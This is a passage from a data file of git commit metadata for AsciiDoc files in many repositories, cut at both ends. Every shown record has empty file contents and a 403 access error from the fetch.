<ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"ravineet-singh\/odp,rsalveti\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,nmorey\/odp,nmorey\/odp,erachmi\/odp,rsalveti\/odp,erachmi\/odp,mike-holmes-linaro\/odp,nmorey\/odp,dkrot\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,nmorey\/odp,rsalveti\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,ravineet-singh\/odp,rsalveti\/odp,mike-holmes-linaro\/odp,rsalveti\/odp,mike-holmes-linaro\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8f61ac1a6cdc1c9b00237e1a1f26e947d5b26e58","subject":"Install AdoptOpenJDK","message":"Install AdoptOpenJDK\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d514a876228fe642f4a4520d98f77c10a9200f90","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f8af62f49f09f9514709505f1ffa4d746cbd45","subject":"Update 2017-04-22-Hello-world.adoc","message":"Update 2017-04-22-Hello-world.adoc","repos":"bithunshal\/shalsblog,bithunshal\/shalsblog,bithunshal\/shalsblog,bithunshal\/shalsblog","old_file":"_posts\/2017-04-22-Hello-world.adoc","new_file":"_posts\/2017-04-22-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b69f23b82ef66600d509ecf16927479d42a37629","subject":"Update 2019-01-31-Cyber-Exile.adoc","message":"Update 2019-01-31-Cyber-Exile.adoc","repos":"netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io,netrunnerX\/netrunnerx.github.io","old_file":"_posts\/2019-01-31-Cyber-Exile.adoc","new_file":"_posts\/2019-01-31-Cyber-Exile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netrunnerX\/netrunnerx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abbc08d2d28fcd8f8ec39b126d54c8aaac59091f","subject":"Update 2019-02-10-RTFM-Part-1.adoc","message":"Update 2019-02-10-RTFM-Part-1.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_file":"_posts\/2019-02-10-RTFM-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7d7a86c31cde828d40c4cfc71d222954542afc7","subject":"Update 2015-05-31-Formatierung.adoc","message":"Update 2015-05-31-Formatierung.adoc","repos":"teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io,teilautohall\/teilautohall.github.io","old_file":"_posts\/2015-05-31-Formatierung.adoc","new_file":"_posts\/2015-05-31-Formatierung.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/teilautohall\/teilautohall.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ae848e81a97b36b344a36ca33b9cd4610fff58e","subject":"Update 2016-12-1-re-Invent2016.adoc","message":"Update 2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_file":"_posts\/2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85e8e7d5c8e13148b7928209a86d67c53a6c4d80","subject":"Deleted _posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","message":"Deleted _posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afb409d9dedd034a8a37f1cf41a0d4a73cf642da","subject":"Update 2017-01-20-Notice-of-holding-google-Apps-Script.adoc","message":"Update 2017-01-20-Notice-of-holding-google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Notice-of-holding-google-Apps-Script.adoc","new_file":"_posts\/2017-01-20-Notice-of-holding-google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7271bd32dbd9ed9585b3a1e2d10c8b73e8228b22","subject":"Worked on Apple Unified Logging and Activity Tracing documentation","message":"Worked on Apple Unified Logging and Activity Tracing documentation\n\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Apple Unified Logging and Activity Tracing formats.asciidoc","new_file":"documentation\/Apple Unified Logging and Activity Tracing formats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ffbabe88d4fe6c0d4af1a592dff8ae4cd22f2bb4","subject":"Blog: JPA Hibernate","message":"Blog: JPA 
Hibernate\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2015-08-23-IntegratingJpaHibernateWithOptaPlanner.adoc","new_file":"blog\/2015-08-23-IntegratingJpaHibernateWithOptaPlanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0612ce8c95b78c7547f5e00f28a5c20ddaa77f2a","subject":"Note: joining strings","message":"Note: joining strings\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"389289e9d9eb74c937f2b4cd80b42497e7812434","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/06\/10\/deref.adoc","new_file":"content\/news\/2022\/06\/10\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"9b61607ddc635778a2816eea11eb96aab5066235","subject":"create post The Most Requested Smartphone I've NEVER Featured...","message":"create post The Most Requested Smartphone I've NEVER Featured...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Most-Requested-Smartphone-Ive-NEVER-Featured....adoc","new_file":"_posts\/2018-02-26-The-Most-Requested-Smartphone-Ive-NEVER-Featured....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d96a598de529e102c312afb630f1db15b5ce005","subject":"Update 2016-11-10.adoc","message":"Update 2016-11-10.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10.adoc","new_file":"_posts\/2016-11-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f175cfe29ec2bbfbe43caa71127437586903945","subject":"New table test with equal table cells.","message":"New table test with equal table cells.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters4.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} 
{"commit":"be453f247b7677e31acc8024007e770e1b779b2d","subject":"add README","message":"add README\n","repos":"pwoolcoc\/cargo-template","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pwoolcoc\/cargo-template.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e27e584493bbdbfb1d138bf1acd53bdcf29dda0","subject":"Create README.adoc","message":"Create README.adoc","repos":"jvissers\/itwercks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jvissers\/itwercks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"60dfda8a0b38d15010bc89f02628ef5ace9ce1b9","subject":"Create README.adoc","message":"Create README.adoc","repos":"flowdev\/website,flowdev\/website","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flowdev\/website.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1dceebdcc1ff32de8c4c2978181485c040db1f0b","subject":"add new format readme","message":"add new format readme","repos":"iCok\/FindElementInFrames,iCok\/FindElementInFrames,iCok\/FindElementInFrames","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCok\/FindElementInFrames.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae5e2d80578dc5ec23923286c171285cc838c7c7","subject":"Create README.adoc","message":"Create README.adoc","repos":"inadarei\/uber.client.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inadarei\/uber.client.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e096e1090b872caa45bafc163e6ff2c229533b1a","subject":"Update 2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","message":"Update 2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","new_file":"_posts\/2011-11-21-0901-Ameliorer-la-securite-du-developpement-avec-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"645d132b009d9d1f9269239b327ede688d5e7122","subject":"Lab 03 instructor notes","message":"Lab 03 instructor notes\n","repos":"dm-academy\/aitm-labs,AshirwadShrestha\/aitm-labs,dm-academy\/aitm-labs,AshirwadShrestha\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-03\/03-instructor-notes.adoc","new_file":"Lab-03\/03-instructor-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dm-academy\/aitm-labs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1de4232d483acda3e044eb24988c8fdd6afe44","subject":"Update 
2015-04-15-Que-vous-apporte-un-outil-APM.adoc","message":"Update 2015-04-15-Que-vous-apporte-un-outil-APM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Que-vous-apporte-un-outil-APM.adoc","new_file":"_posts\/2015-04-15-Que-vous-apporte-un-outil-APM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8458abd9a4f0fae12e004aaff963e830ae79c0c1","subject":"y2b create post Unboxing The $20,000 Smartphone","message":"y2b create post Unboxing The $20,000 Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-25-Unboxing-The-20000-Smartphone.adoc","new_file":"_posts\/2016-12-25-Unboxing-The-20000-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6961ec54e9980eff91b495c646c8bbd664eadb06","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"951721f17584c92ae5a32cf3aed823e326ce52e9","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b9d2a210998104caaa538d085a928edb91752c4","subject":"Update 2017-02-24-Google-Extention.adoc","message":"Update 2017-02-24-Google-Extention.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extention.adoc","new_file":"_posts\/2017-02-24-Google-Extention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28217eaa4b9710e74a5b2b604de049e9882303da","subject":"Update 2016-12-11-S-P00-December-Seasonality.adoc","message":"Update 
2016-12-11-S-P00-December-Seasonality.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-12-11-S-P00-December-Seasonality.adoc","new_file":"_posts\/2016-12-11-S-P00-December-Seasonality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"899d06fe0e1b314ab3ceb0a9e609e94779c8383d","subject":"Adds instruction on how to upgrade Font Awesome","message":"Adds instruction on how to upgrade Font Awesome\n","repos":"asciidoctor\/asciidoctor-firefox-addon","old_file":"contributing-code.adoc","new_file":"contributing-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctor-firefox-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a648fd4c371b64fcee3965ea77f2182ad1cdba62","subject":"Translation of progress course module","message":"Translation of progress course module\n","repos":"skoba\/mml,skoba\/mml","old_file":"doc\/MML4\/doc_e\/progress_course.adoc","new_file":"doc\/MML4\/doc_e\/progress_course.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skoba\/mml.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4332446490352c282351f8d4b5eb25edf28bc04","subject":"Heroku driven architecture: initial thoughts.","message":"Heroku driven architecture: initial thoughts.\n","repos":"crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast,crispab\/codekvast","old_file":"product\/docs\/src\/docs\/asciidoc\/HerokuDrivenArchitecture.adoc","new_file":"product\/docs\/src\/docs\/asciidoc\/HerokuDrivenArchitecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crispab\/codekvast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ac30fb80b5f64a92d866a20b579a80b526da469","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4a17383a7c1571b3a4846f75e30ce49c051bb59","subject":"Update 2017-01-21-Intersection.adoc","message":"Update 2017-01-21-Intersection.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-21-Intersection.adoc","new_file":"_posts\/2017-01-21-Intersection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c9b70cfcb64504a1c5f6684b67a1da803dc5b50","subject":"Update 
2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a9264eb574bf127b7477d7409938a39d865d7c6","subject":"[SDF] Add sdf documentation","message":"[SDF] Add sdf documentation\n","repos":"arago\/OGIT,arago\/OGIT,arago\/OGIT","old_file":"SDF\/README.adoc","new_file":"SDF\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arago\/OGIT.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a405bd27280b801bd05c5689dc87aa3ed73aaa0","subject":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","message":"Update YubiKey_and_FreeRADIUS_via_PAM.adoc","repos":"madrat-\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_file":"doc\/YubiKey_and_FreeRADIUS_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"562b660926554b8eecac2af153b2722638cfcd00","subject":"index.adoc updated","message":"index.adoc updated","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6af67cd9869693e32918c3b8f3491c2b0ce4dc","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e900d9792dfafb2ffefbb27fddff45a9ec99025b","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd6737e377e6c7780c7d288519471a4cf20b7d31","subject":"Update 2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-app-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8caa9a133882fb029609b6d3b4cd801203a8d856","subject":"hello security","message":"hello security\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"security.adoc","new_file":"security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b633c5cd94dab538d560364f4357345abf57adb6","subject":"Update 2015-02-24-Need-h1-to-save.adoc","message":"Update 2015-02-24-Need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-Need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"553a2e570a9b532d8340c0de0b953838b328fe63","subject":"Update 2016-09-11-Blogging-Begins.adoc","message":"Update 2016-09-11-Blogging-Begins.adoc","repos":"blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io,blogforfun\/blogforfun.github.io","old_file":"_posts\/2016-09-11-Blogging-Begins.adoc","new_file":"_posts\/2016-09-11-Blogging-Begins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blogforfun\/blogforfun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7520a8cc3c886cfc047c43fb54da8b40ed42c7a8","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0450c9d32eeb73c258ad0a01d4f44e3b3acb8d97","subject":"man\/man9\/delayline.9.asciidoc: fixer upper","message":"man\/man9\/delayline.9.asciidoc: fixer 
upper\n","repos":"ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit","old_file":"man\/man9\/delayline.9.asciidoc","new_file":"man\/man9\/delayline.9.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"1516e02d872ff447594cd1ea2048e41766b158e3","subject":"Update 2016-10-27-init.adoc","message":"Update 2016-10-27-init.adoc","repos":"livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io,livehua\/livehua.github.io","old_file":"_posts\/2016-10-27-init.adoc","new_file":"_posts\/2016-10-27-init.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/livehua\/livehua.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0b630954b0b2b66b02c70b9345b0fe0eb6751fb","subject":"Update 